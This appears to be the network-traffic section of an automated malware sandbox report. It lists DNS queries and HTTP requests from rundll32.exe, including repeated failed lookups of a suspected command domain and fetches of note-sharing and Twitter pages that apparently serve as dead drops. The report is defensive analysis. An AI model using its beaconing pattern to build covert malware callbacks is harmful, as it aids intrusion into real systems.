                                                                                                                                                Feb 22, 2021 23:44:46.680367947 CET6436753192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:46.737562895 CET53643678.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:47.341013908 CET5506653192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:47.401242018 CET53550668.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:51.502825022 CET6021153192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:51.561317921 CET53602118.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:52.641737938 CET5657053192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:52.698885918 CET53565708.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:56.580497980 CET5845453192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:56.631185055 CET53584548.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:00.952073097 CET5518053192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:01.011410952 CET53551808.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:05.044641018 CET5872153192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:05.101933956 CET53587218.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:09.085295916 CET5769153192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:09.137192011 CET53576918.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:13.667998075 CET5294353192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:13.739180088 CET53529438.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:17.671547890 CET5948953192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:17.728609085 CET53594898.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:22.663036108 CET6402253192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:22.722213984 CET53640228.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:26.067994118 CET6002353192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:26.116702080 CET53600238.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:26.533997059 CET5719353192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:26.601561069 CET53571938.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:26.783953905 CET5024853192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:26.846184015 CET53502488.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:31.276859999 CET6441353192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:31.336899996 CET53644138.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:34.203836918 CET6042953192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:34.265505075 CET53604298.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:35.335813999 CET6034553192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:35.397275925 CET53603458.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:39.328581095 CET5873053192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:39.389363050 CET53587308.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:43.494561911 CET5383053192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:43.556246996 CET53538308.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:46.885092020 CET5722653192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:46.933826923 CET53572268.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:47.410886049 CET5788053192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:47.468272924 CET53578808.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:47.825324059 CET6085053192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:47.885339975 CET53608508.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.275800943 CET5318753192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:48.326023102 CET53531878.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:48.437019110 CET5583053192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:48.485894918 CET53558308.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.018471003 CET5514553192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:49.067053080 CET53551458.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.414450884 CET6409153192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:49.473898888 CET53640918.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.765243053 CET5572853192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:52.818150043 CET53557288.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.318003893 CET5569453192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:45:57.378112078 CET53556948.8.8.8192.168.2.6

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                Feb 22, 2021 23:43:57.029077053 CET192.168.2.68.8.8.80xb853Standard query (0)thinkery.meA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:58.140388966 CET192.168.2.68.8.8.80xa2bStandard query (0)simp.lyA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:58.545612097 CET192.168.2.68.8.8.80x67e3Standard query (0)app.simplenote.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:59.004766941 CET192.168.2.68.8.8.80x51a1Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:59.177408934 CET192.168.2.68.8.8.80x83fStandard query (0)twitter.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:59.859427929 CET192.168.2.68.8.8.80x2df8Standard query (0)mobile.twitter.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:00.317826033 CET192.168.2.68.8.8.80x15eStandard query (0)www.fotolog.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:03.776860952 CET192.168.2.68.8.8.80x2da1Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:07.991556883 CET192.168.2.68.8.8.80xc92dStandard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:13.409130096 CET192.168.2.68.8.8.80xfed8Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:17.268011093 CET192.168.2.68.8.8.80xc85dStandard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:21.494102955 CET192.168.2.68.8.8.80x76c2Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:25.394740105 CET192.168.2.68.8.8.80x1659Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:30.066056967 CET192.168.2.68.8.8.80xeaa1Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:35.155323029 CET192.168.2.68.8.8.80xf01eStandard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:39.190032959 CET192.168.2.68.8.8.80xbdadStandard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:43.113280058 CET192.168.2.68.8.8.80xd272Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:47.341013908 CET192.168.2.68.8.8.80x7816Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:52.641737938 CET192.168.2.68.8.8.80x584cStandard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:56.580497980 CET192.168.2.68.8.8.80xb41aStandard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:00.952073097 CET192.168.2.68.8.8.80xc421Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:05.044641018 CET192.168.2.68.8.8.80xc7daStandard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:09.085295916 CET192.168.2.68.8.8.80x6169Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:13.667998075 CET192.168.2.68.8.8.80xc6eaStandard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:17.671547890 CET192.168.2.68.8.8.80xe8d0Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:22.663036108 CET192.168.2.68.8.8.80xd21bStandard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:26.783953905 CET192.168.2.68.8.8.80xb1b4Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:31.276859999 CET192.168.2.68.8.8.80xf9ddStandard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:35.335813999 CET192.168.2.68.8.8.80x5f0bStandard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:39.328581095 CET192.168.2.68.8.8.80xe5d2Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:43.494561911 CET192.168.2.68.8.8.80x7441Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:47.410886049 CET192.168.2.68.8.8.80x2954Standard query (0)simp.lyA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:47.825324059 CET192.168.2.68.8.8.80x58dcStandard query (0)app.simplenote.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:48.275800943 CET192.168.2.68.8.8.80x2338Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:48.437019110 CET192.168.2.68.8.8.80x89faStandard query (0)twitter.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:49.018471003 CET192.168.2.68.8.8.80x55b4Standard query (0)mobile.twitter.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:49.414450884 CET192.168.2.68.8.8.80x1d0cStandard query (0)www.fotolog.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:52.765243053 CET192.168.2.68.8.8.80x4cb6Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:57.318003893 CET192.168.2.68.8.8.80xa0d4Standard query (0)powerpolymerindustry.comA (IP address)IN (0x0001)

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                Feb 22, 2021 23:43:57.091340065 CET8.8.8.8192.168.2.60xb853No error (0)thinkery.me5.9.110.84A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:58.200539112 CET8.8.8.8192.168.2.60xa2bNo error (0)simp.ly192.0.84.247A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:58.606184006 CET8.8.8.8192.168.2.60x67e3No error (0)app.simplenote.com216.239.32.21A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:58.606184006 CET8.8.8.8192.168.2.60x67e3No error (0)app.simplenote.com216.239.38.21A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:58.606184006 CET8.8.8.8192.168.2.60x67e3No error (0)app.simplenote.com216.239.36.21A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:58.606184006 CET8.8.8.8192.168.2.60x67e3No error (0)app.simplenote.com216.239.34.21A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:59.062094927 CET8.8.8.8192.168.2.60x51a1Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:59.230046034 CET8.8.8.8192.168.2.60x83fNo error (0)twitter.com104.244.42.1A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:59.230046034 CET8.8.8.8192.168.2.60x83fNo error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:59.908286095 CET8.8.8.8192.168.2.60x2df8No error (0)mobile.twitter.com104.244.42.70A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:59.908286095 CET8.8.8.8192.168.2.60x2df8No error (0)mobile.twitter.com104.244.42.198A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:59.908286095 CET8.8.8.8192.168.2.60x2df8No error (0)mobile.twitter.com104.244.42.6A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:43:59.908286095 CET8.8.8.8192.168.2.60x2df8No error (0)mobile.twitter.com104.244.42.134A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:00.380970001 CET8.8.8.8192.168.2.60x15eNo error (0)www.fotolog.com172.67.204.156A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:00.380970001 CET8.8.8.8192.168.2.60x15eNo error (0)www.fotolog.com104.21.85.104A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:03.834188938 CET8.8.8.8192.168.2.60x2da1Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:08.048918009 CET8.8.8.8192.168.2.60xc92dName error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:13.466650963 CET8.8.8.8192.168.2.60xfed8Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:17.328210115 CET8.8.8.8192.168.2.60xc85dName error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:21.555789948 CET8.8.8.8192.168.2.60x76c2Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:25.454904079 CET8.8.8.8192.168.2.60x1659Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:30.123296976 CET8.8.8.8192.168.2.60xeaa1Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:35.212421894 CET8.8.8.8192.168.2.60xf01eName error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:39.254734039 CET8.8.8.8192.168.2.60xbdadName error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:43.170454979 CET8.8.8.8192.168.2.60xd272Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:47.401242018 CET8.8.8.8192.168.2.60x7816Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:52.698885918 CET8.8.8.8192.168.2.60x584cName error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:44:56.631185055 CET8.8.8.8192.168.2.60xb41aName error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:01.011410952 CET8.8.8.8192.168.2.60xc421Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:05.101933956 CET8.8.8.8192.168.2.60xc7daName error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:09.137192011 CET8.8.8.8192.168.2.60x6169Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:13.739180088 CET8.8.8.8192.168.2.60xc6eaName error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:17.728609085 CET8.8.8.8192.168.2.60xe8d0Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:22.722213984 CET8.8.8.8192.168.2.60xd21bName error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:26.846184015 CET8.8.8.8192.168.2.60xb1b4Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:31.336899996 CET8.8.8.8192.168.2.60xf9ddName error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:35.397275925 CET8.8.8.8192.168.2.60x5f0bName error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:39.389363050 CET8.8.8.8192.168.2.60xe5d2Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:43.556246996 CET8.8.8.8192.168.2.60x7441Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:47.468272924 CET8.8.8.8192.168.2.60x2954No error (0)simp.ly192.0.84.247A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:47.885339975 CET8.8.8.8192.168.2.60x58dcNo error (0)app.simplenote.com216.239.32.21A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:47.885339975 CET8.8.8.8192.168.2.60x58dcNo error (0)app.simplenote.com216.239.38.21A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:47.885339975 CET8.8.8.8192.168.2.60x58dcNo error (0)app.simplenote.com216.239.34.21A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:47.885339975 CET8.8.8.8192.168.2.60x58dcNo error (0)app.simplenote.com216.239.36.21A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:48.326023102 CET8.8.8.8192.168.2.60x2338Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:48.485894918 CET8.8.8.8192.168.2.60x89faNo error (0)twitter.com104.244.42.1A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:48.485894918 CET8.8.8.8192.168.2.60x89faNo error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:49.067053080 CET8.8.8.8192.168.2.60x55b4No error (0)mobile.twitter.com104.244.42.6A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:49.067053080 CET8.8.8.8192.168.2.60x55b4No error (0)mobile.twitter.com104.244.42.134A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:49.067053080 CET8.8.8.8192.168.2.60x55b4No error (0)mobile.twitter.com104.244.42.198A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:49.067053080 CET8.8.8.8192.168.2.60x55b4No error (0)mobile.twitter.com104.244.42.70A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:49.473898888 CET8.8.8.8192.168.2.60x1d0cNo error (0)www.fotolog.com172.67.204.156A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:49.473898888 CET8.8.8.8192.168.2.60x1d0cNo error (0)www.fotolog.com104.21.85.104A (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:52.818150043 CET8.8.8.8192.168.2.60x4cb6Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Feb 22, 2021 23:45:57.378112078 CET8.8.8.8192.168.2.60xa0d4Name error (3)powerpolymerindustry.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • thinkery.me
                                                                                                                                                • simp.ly
                                                                                                                                                • twitter.com
                                                                                                                                                • www.fotolog.com

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.6497165.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:43:57.189940929 CET1229OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:43:57.261218071 CET1230INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:43:57 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.649719192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:43:58.368573904 CET1258OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:43:58.534533024 CET1259INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:43:58 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                10192.168.2.649748104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:08.214572906 CET1557OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:08.388858080 CET1557INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:08 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_8Es+9FFIkUw0aKnFWnNEKg=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:08 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403384831808969; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:08 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 0024d76c2d8278ba1d45721456f4b697
                                                                                                                                                x-response-time: 117


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                100192.168.2.6499755.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:46.305159092 CET7613OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:46.373723984 CET7613INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:46 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                101192.168.2.649978192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:47.642577887 CET7634OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:47.812096119 CET7635INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:47 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                102192.168.2.649980104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:48.548012018 CET7643OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
